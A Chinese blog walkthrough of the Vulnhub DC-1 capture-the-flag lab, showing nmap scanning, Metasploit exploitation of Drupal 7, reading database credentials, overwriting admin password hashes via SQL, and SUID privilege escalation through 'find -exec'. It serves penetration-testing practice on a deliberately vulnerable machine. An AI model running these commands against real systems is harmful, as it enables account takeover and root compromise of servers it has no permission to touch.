Vulnhub靶机:DC-1渗透详细过程

已于 2024-04-10 13:53:43 修改
阅读量836 收藏 21
点赞数 20
文章标签: web安全 网络安全 linux
于 2024-04-01 12:04:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/timeless_cz/article/details/137210517
版权

靶机下载地址放在文章最后啦

一、靶机的搭建

1.打开文件夹右击使用VM虚拟机打开​​​​​​​​​​​​​​

2.给虚拟机取个名字(我这里就直接DC-1),选择自己虚拟机存放的位置

3.等待虚拟机的导入

4.虚拟机网络默认的桥接模式,直接开启虚拟机即可

5.靶场的登录界面(不知道密码和账号),IP也不知道是好多。

二、渗透过程

1.直接上nmap扫一下存活的IP地址

我这里IP地址有点多,13这台机子应该就是DC-2靶机IP了

nmap -sn 10.189.100.10-20

2.再用nmap扫一下开放的端口

nmap -sV -A -p- 10.189.100.13

​​​​​​​

3.发现只开放了 22ssh,80http和111,48121四个端口,先访问80端口看看

http://10.189.100.13

4.发现是drupal框架,我们使用whatweb看看网站的指纹信息

whatweb -v 10.189.100.13

5.发现是Drupal 7,这个版本有漏洞,直接使用msf

msfconsole

6.搜索Drupal 7相关漏洞脚本,发现有7个漏洞脚本,我们就挨着试看那个脚本可以使用

search drupal 7

7.先选择1号脚本试试

use 1

​​​​​​​​​​​options看一下需要设置的参数,这里只需要设置靶机IP地址

options

设置参数靶机IP地址

set rhosts 10.189.100.13

设置好后直接run,发现已经成功连接

run

8.现在我们使用shell,再看看我们的权限whoami一下,目前我们是www-data,后续我们需要提权。

shell
Whoami

9.pwd看看当前我们在那个路径(/var/www),并且ls一下看看有什么文件,我们发现了flag1.txt,直接使用cat打开。

pwd
ls
cat flag1.txt

10.我们找到了第一个flag1.txt,翻译一下flag1的意思,现在我们百度一下drupal CMS默认配置文件,在/sites/default/settings.php。

11.我们先打开配置文件查看一下,我们发现了flag2和mysql数据库的账号密码。我们翻译一下flag2的意思。

cat sites/default/settings.php

12.使用python先反弹一下shell

python -c 'import pty;pty.spawn("/bin/bash")'

13.现在连接一下mysql数据库

mysql -udbuser -p

14.看一下有哪些数据库

show databases;

​​​​​​​

15.我们直接选择drupaldb数据库,并查看有哪些表

use drupaldb;
show tables;

16.我们找到了users表,并在里面找到了两个用户名和密码,但是密码是加密了的,无法直接使用

select * from users
admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR 
Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg

17.我们百度了一下Drupal7的加密方式,发现不可逆的,我们只能通过其他方式生成加密后的密码。

18.退出mysql在网站目录找找有没有关于password有关的文件,我们找到一个密码HASH有关的脚本,先打开看看是什么内容,发现就Drupal加密脚本

exit
find / -name password
cat /var/www/scripts/password-hash.sh

19.我们使用脚本把我们自己的密码加密一下并重新连接数据库(重复13-15步骤)

scripts/password-hash.sh 123456

hash: $S$DlKqThUfFRfM7b8ykCRAy50xSs0vwy39a4jes0n6cbCrL9hmIdh7

20.我们使用SQL语句来替换一下数据库中的密码

update users set pass = "$S$DlKqThUfFRfM7b8ykCRAy50xSs0vwy39a4jes0n6cbCrL9hmIdh7" where name = 'admin' or name = 'Fred';

21.使用我们修改过后的密码登陆​​​​​​​,成功登陆进去

22.在左上角Dashboard里面发现了flag3

23.翻译一下flag3说的什么,看到这里我们需要使用SUID提权,并且在passwd里面查找下一个flag4(passwd在/etc目录下)

24.返回我们的shell进行SUID提权,提权成功,我们现在是root权限了

find / -user root -perm -u=s -type f 2>/dev/null
find /etc/passwd -exec Whoami \;      
#/etc/passwd可以替换,只要是root权限的都可以
#whaoami是我们需要执行的命令,每执行一个命令只需要替换whoami即可,不能直接执行命令

26.我们进入etc目录打开passwd文件,发现flag4在/home目录下

cat /etc/passwd

27.切换到/home/flag4目录下面找到flag4.txt并打开,顺便翻译一下

cd /home/flag4
find /etc/passwd -exec cat flag4.txt \;

28.我们现在是root权限可以进入root目录去查看一下,成功找到最后一个flag并打开它

find /etc/passwd -exec ls /root \;
find /etc/passwd -exec cat /root/thefinalflag.txt \;

​​​​​​​

记得点赞+关注,关注微信公众号菜鸟学渗透,有任何问题可以后台私信我

后台回复"DC-1"即可获得靶场地址

有考取NISP一级/二级/三级、CISP-PTE/PTS等证书的可以加我好友私信我(公众号回复“加好友”)。

菜鸟学渗透
关注
vulnhubDC-1
BurYiA的博客
05-02 650
文章目录vulnhubDC-1准备工作1.主机查找2.信息搜集3.正文方法一方法二 vulnhubDC-1 大神们可以退场了,小白的第一篇文章,可能会有很多错误,很多地方可能也会说不清楚。望见谅。 前段时间了解到这个平台,然后就开始难受了,真心不会做(就是太菜了)。闲话就不多说了,开始吧 准备工作 1.DC-1虚拟机(可能得搭梯子,自行尝试) 2.kali虚拟机 1.主机查找 这个就是基本操作...
VulnHub DC-1
weixin_45682839的博客
04-13 391
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
vulnhub靶场——DC-1
最新发布
pigzlfa的博客
08-12 761
下载后解压得到一个ova文件,直接vmware打开(这里我workstation pro17导入会报错,“未通过ovf规范一致性或虚拟硬件合规性检查”没留下截图,查了好多,最后点了重试,结果就就好了- -)这里把靶机和攻击机用同一种模式连接(都是NAT或者都是桥接),保证俩在同一网段,攻击机能访问到就行。有问题,问百度,so,目标有了,去找/sites/default/settings.php。整理一些思路,目前知道了一个flag4的账户,密码未知,还提示让提权root。
Vulnhub-DC-1
KAKA的博客
06-04 936
配置信息: 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机DC1 (VirtualBox) IP:192.168.67.200 攻机:Kali (Local) IP:192.168.67.109 目标:获取5个flag 开始游戏: 扫描整个网段获取目标IP地址: nmap -sn 192.168.67.0/24 获取目标IP地址:192.168.67.200 扫描目标信息: nmap-A -p-1...
Vulnhub 学习—DC-1
qq_43332837的博客
04-27 167
Zenmap进行主机发现并扫描发现80,22端口开放 访问网址,发现CMS版本msf搜索漏洞 search Drupal use exploit/unix/webapp/drupal_drupalgeddon2 show options set RHOSTS 靶机地址 set LHOSTS 主机地址 run 漏洞利用成功,获取flag1根据flag1的提示找到drupal的配置文件得到数据库的账号密码 shell python -c 'import pty; pty.spawn("/bin/bash")'
Vulnhub系列:DC-1
weixin_41064688的博客
01-09 697
Vulnhub系列:DC-1 第一次尝试写 Description DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. It was designed to be a challenge for beginners, b...
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2549
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3712
前言 这次练习的靶机vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
Vulnhub靶机:DC-9渗透详细过程DC系列完结)
IerkeU的博客
03-28 3826
信息收集 nmap -A -sV -p- -T4 192.168.132.156 目前发现只开放80端口,去web页面搜索一下 有一处后台登陆、一处搜索处 在搜索处1' or 1=1#页面返回正常,1' or 1=2#报错,BP抓包发现是POST 输出文件:sql进入kali一把梭 SQLMAP sqlmap -r sql --dbs --dump sqlmap -r sql -D users -T UserDetails -C id,username,password --dump 将admin
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 2000
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4615
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
DC-1靶场搭建及渗透实战详细过程DC靶场系列)
热门推荐
金 帛的博客
06-29 1万+
DC-1靶场渗透过程,写的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
VulnHubDC-1
weixin_39219503的博客
01-29 272
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-1,292/ 题目信息如下,环境中有flag文件,里面有hint DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. ...
vulnhub DC-1
底层社会中的弱智
08-27 197
新安装的扫描器 droopescan 找到目标靶机IP 扫描全端口 可以看到80端口的CMS采用的Drupal 7 ,使用新安装的扫描器进行扫描 也可以使用whatweb命令查看CMS 扫描器 进入MSF所搜可以使用漏洞利用模块 利用模块设置模块参数 开始提权 提权 ...
Vulnhub 靶机DC-1
Lee_yc的博客
08-18 275
扫描局域网中的IP地址,确定靶机ip arp-scan -l
Vulnhub靶机——DC-1
流水不争先,争的是滔滔不绝
04-18 910
Vulnhub靶机——DC-1,cms(Drupal 7)存在框架漏洞,msf利用框架漏洞拿到普通用户的shell,再通过SUID提权
vulnhub DC-1 靶机
FourthGuy的博客
05-03 631
打开我们的kali linuxDC-1 靶机 信息收集 扫描靶机ip: arp-scan -l 查看网段的所有主机 由上图得到DC-1靶机ip为192.168.88.129 nmap端口扫描:接下来就要用我们的神器nmap了 (端口:如果我们把ip看成是一个房子,端口就是门,我们需要通过端口来从ip这里获取,传输数据) ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

菜鸟学渗透

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值